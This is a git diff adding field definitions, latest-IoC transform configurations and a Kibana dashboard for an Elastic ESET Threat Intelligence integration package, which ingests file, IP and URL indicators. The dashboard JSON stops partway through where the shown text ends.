b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/agent.yml @@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' + - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. diff --git a/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/base-fields.yml b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/ecs.yml b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/ecs.yml new file mode 100644 index 00000000000..43534883f1c --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/ecs.yml @@ -0,0 +1,42 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: event.category +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.created +- external: ecs + name: tags +- external: ecs + name: threat.indicator.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.file.hash.md5 +- external: ecs + name: threat.indicator.file.hash.sha1 +- external: ecs + name: threat.indicator.file.hash.sha256 +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.feed.name diff --git a/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/fields.yml b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/fields.yml new file mode 100644 index 00000000000..18accf0bda4 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/fields.yml @@ -0,0 +1,17 @@ +- name: eset + type: group + description: > + Fields for ESET Threat Intelligence + + fields: + - name: id + type: keyword + description: The UID of the event object. + - name: valid_until + type: date + description: >- + Event expiration date. + - name: labels + type: keyword + description: >- + Threat labels. diff --git a/packages/ti_eset/elasticsearch/transform/files_latest_ioc/manifest.yml b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/manifest.yml new file mode 100644 index 00000000000..f9e3e588fd4 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/manifest.yml @@ -0,0 +1,18 @@ +destination_index_template: + mappings: + date_detection: false + dynamic: true + dynamic_templates: + - strings_as_keyword: + mapping: + ignore_above: 1024 + type: keyword + match_mapping_type: string + settings: + index: + sort: + field: + - '@timestamp' + order: + - desc +start: true diff --git a/packages/ti_eset/elasticsearch/transform/files_latest_ioc/transform.yml b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/transform.yml new file mode 100644 index 00000000000..05625c91bb5 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/files_latest_ioc/transform.yml @@ -0,0 +1,26 @@ +_meta: + fleet_transform_version: 0.1.0 + managed: true +description: Latest ESET Files IoC data +dest: + index: logs-ti_eset_latest.dest_files-1 + aliases: + - alias: logs-ti_eset_latest.files + move_on_creation: true +frequency: 30s +latest: + sort: '@timestamp' + unique_key: + - event.dataset + - eset.id +retention_policy: + time: + field: eset.valid_until + max_age: 1m +source: + index: + - logs-ti_eset.files-* +sync: + time: + delay: 120s + field: event.ingested diff --git a/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/agent.yml b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/agent.yml @@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' + - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. diff --git a/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/base-fields.yml b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/ecs.yml b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/ecs.yml new file mode 100644 index 00000000000..532e63297da --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/ecs.yml @@ -0,0 +1,40 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: event.category +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.created +- external: ecs + name: tags +- external: ecs + name: threat.indicator.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.feed.name +- external: ecs + name: threat.indicator.ip +- external: ecs + name: threat.indicator.port diff --git a/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/fields.yml b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/fields.yml new file mode 100644 index 00000000000..18accf0bda4 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/fields/fields.yml @@ -0,0 +1,17 @@ +- name: eset + type: group + description: > + Fields for ESET Threat Intelligence + + fields: + - name: id + type: keyword + description: The UID of the event object. + - name: valid_until + type: date + description: >- + Event expiration date. + - name: labels + type: keyword + description: >- + Threat labels. diff --git a/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/manifest.yml b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/manifest.yml new file mode 100644 index 00000000000..f9e3e588fd4 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/manifest.yml @@ -0,0 +1,18 @@ +destination_index_template: + mappings: + date_detection: false + dynamic: true + dynamic_templates: + - strings_as_keyword: + mapping: + ignore_above: 1024 + type: keyword + match_mapping_type: string + settings: + index: + sort: + field: + - '@timestamp' + order: + - desc +start: true diff --git a/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/transform.yml b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/transform.yml new file mode 100644 index 00000000000..47c99f037e5 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/ip_latest_ioc/transform.yml @@ -0,0 +1,26 @@ +_meta: + fleet_transform_version: 0.1.0 + managed: true +description: Latest ESET IP IoC data +dest: + index: logs-ti_eset_latest.dest_ip-1 + aliases: + - alias: logs-ti_eset_latest.ip + move_on_creation: true +frequency: 30s +latest: + sort: '@timestamp' + unique_key: + - event.dataset + - eset.id +retention_policy: + time: + field: eset.valid_until + max_age: 1m +source: + index: + - logs-ti_eset.ip-* +sync: + time: + delay: 120s + field: event.ingested diff --git a/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/agent.yml b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/agent.yml @@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' + - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. diff --git a/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/base-fields.yml b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/ecs.yml b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/ecs.yml new file mode 100644 index 00000000000..d3f9633c4c9 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/ecs.yml @@ -0,0 +1,36 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: event.category +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.created +- external: ecs + name: tags +- external: ecs + name: threat.indicator.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.feed.name diff --git a/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/fields.yml b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/fields.yml new file mode 100644 index 00000000000..18accf0bda4 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/fields/fields.yml @@ -0,0 +1,17 @@ +- name: eset + type: group + description: > + Fields for ESET Threat Intelligence + + fields: + - name: id + type: keyword + description: The UID of the event object. + - name: valid_until + type: date + description: >- + Event expiration date. + - name: labels + type: keyword + description: >- + Threat labels. diff --git a/packages/ti_eset/elasticsearch/transform/url_latest_ioc/manifest.yml b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/manifest.yml new file mode 100644 index 00000000000..f9e3e588fd4 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/manifest.yml @@ -0,0 +1,18 @@ +destination_index_template: + mappings: + date_detection: false + dynamic: true + dynamic_templates: + - strings_as_keyword: + mapping: + ignore_above: 1024 + type: keyword + match_mapping_type: string + settings: + index: + sort: + field: + - '@timestamp' + order: + - desc +start: true diff --git a/packages/ti_eset/elasticsearch/transform/url_latest_ioc/transform.yml b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/transform.yml new file mode 100644 index 00000000000..57ff6f12d31 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/url_latest_ioc/transform.yml @@ -0,0 +1,26 @@ +_meta: + fleet_transform_version: 0.1.0 + managed: true +description: Latest ESET URL IoC data +dest: + index: logs-ti_eset_latest.dest_url-1 + aliases: + - alias: logs-ti_eset_latest.url + move_on_creation: true +frequency: 30s +latest: + sort: '@timestamp' + unique_key: + - event.dataset + - eset.id +retention_policy: + time: + field: eset.valid_until + max_age: 1m +source: + index: + - logs-ti_eset.url-* +sync: + time: + delay: 120s + field: event.ingested diff --git a/packages/ti_eset/img/eset-lozenge-color-rgb.svg b/packages/ti_eset/img/eset-lozenge-color-rgb.svg new file mode 100644 index 00000000000..e49ac59aa79 --- /dev/null +++ b/packages/ti_eset/img/eset-lozenge-color-rgb.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/packages/ti_eset/img/files.png b/packages/ti_eset/img/files.png new file mode 100644 index 00000000000..0973685f6d5 Binary files /dev/null and b/packages/ti_eset/img/files.png differ diff --git a/packages/ti_eset/img/overview.png b/packages/ti_eset/img/overview.png new file mode 100644 index 00000000000..b5a728c97eb Binary files /dev/null and b/packages/ti_eset/img/overview.png differ diff --git a/packages/ti_eset/img/url-ip.png b/packages/ti_eset/img/url-ip.png new file mode 100644 index 00000000000..7c839e49bad Binary files /dev/null and b/packages/ti_eset/img/url-ip.png differ diff --git a/packages/ti_eset/kibana/dashboard/ti_eset-402bf6b0-8194-11ee-a704-a3364df0a052.json b/packages/ti_eset/kibana/dashboard/ti_eset-402bf6b0-8194-11ee-a704-a3364df0a052.json new file mode 100644 index 00000000000..b3b724c17fc --- /dev/null +++ b/packages/ti_eset/kibana/dashboard/ti_eset-402bf6b0-8194-11ee-a704-a3364df0a052.json @@ -0,0 +1,1273 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"91dfea82-e7ea-473c-adfa-45623e39ba59\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"large\",\"explicitInput\":{\"id\":\"91dfea82-e7ea-473c-adfa-45623e39ba59\",\"fieldName\":\"data_stream.dataset\",\"title\":\"Feed name\",\"grow\":true,\"width\":\"large\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Dashboard displaying detailed domain, URL and IP data.", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "negate": false, + "params": [ + { + "meta": { + "alias": null, + "disabled": false, + "field": "_index", + "index": "logs-*", + "key": "_index", + "negate": false, + "params": { + "query": "logs-ti_eset_latest.*" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "_index": "logs-ti_eset_latest.*" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "logs-*", + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "threat.indicator.type", + "index": "logs-*", + "key": "threat.indicator.type", + "negate": false, + "params": [ + "domain-name", + "ipv4-addr", + "url" + ], + "type": "phrases", + "value": [ + "domain-name", + "ipv4-addr", + "url" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "threat.indicator.type": "domain-name" + } + }, + { + "match_phrase": { + "threat.indicator.type": "ipv4-addr" + } + }, + { + "match_phrase": { + "threat.indicator.type": "url" + } + } + ] + } + } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "#### ESET Threat Intelligence\n**Navigation**\n\n- [Overview](/app/dashboards#/view/ti_eset-f608e350-8192-11ee-a704-a3364df0a052)\n- **[Domains, URL, IP (This page)](/app/dashboards#/view/ti_eset-402bf6b0-8194-11ee-a704-a3364df0a052)**\n- [Files](/app/dashboards#/view/ti_eset-4fc91930-819a-11ee-a704-a3364df0a052)\n- [Other indicators](/app/dashboards#/view/ti_eset-c27d91e0-819a-11ee-a704-a3364df0a052)\n\n[Integrations Page](/app/integrations/detail/ti_eset/overview)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 20, + "i": "dc4aa363-7c3d-4e4e-8d2d-1e6997575cec", + "w": 8, + "x": 0, + "y": 0 + }, + "panelIndex": "dc4aa363-7c3d-4e4e-8d2d-1e6997575cec", + "type": "visualization", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-eba6f3ca-af23-403f-8828-7c7a11af1337", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "eba6f3ca-af23-403f-8828-7c7a11af1337": { + "columnOrder": [ + "b2694625-806e-4d4d-b96a-0b3ea2037123" + ], + "columns": { + "b2694625-806e-4d4d-b96a-0b3ea2037123": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total indicators", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "b2694625-806e-4d4d-b96a-0b3ea2037123", + "colorMode": "Labels", + "layerId": "eba6f3ca-af23-403f-8828-7c7a11af1337", + "layerType": "data", + "palette": { + "name": "custom", + "params": { + "colorStops": [ + { + "color": "#ff5d5d", + "stop": null + }, + { + "color": "#005e4f", + "stop": 1 + } + ], + "continuity": "all", + "maxSteps": 5, + "name": "custom", + "progression": "fixed", + "rangeMax": null, + "rangeMin": null, + "rangeType": "number", + "reverse": false, + "steps": 3, + "stops": [ + { + "color": "#ff5d5d", + "stop": 1 + }, + { + "color": "#005e4f", + "stop": 81780 + } + ] + }, + "type": "palette" + }, + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 10, + "i": "38c8f7af-022b-4fd7-bd1c-b91a734261a1", + "w": 7, + "x": 8, + "y": 0 + }, + "panelIndex": "38c8f7af-022b-4fd7-bd1c-b91a734261a1", + "title": "Total indicators", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e90d8bf4-3571-4bce-9ab0-548c27b3137b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + 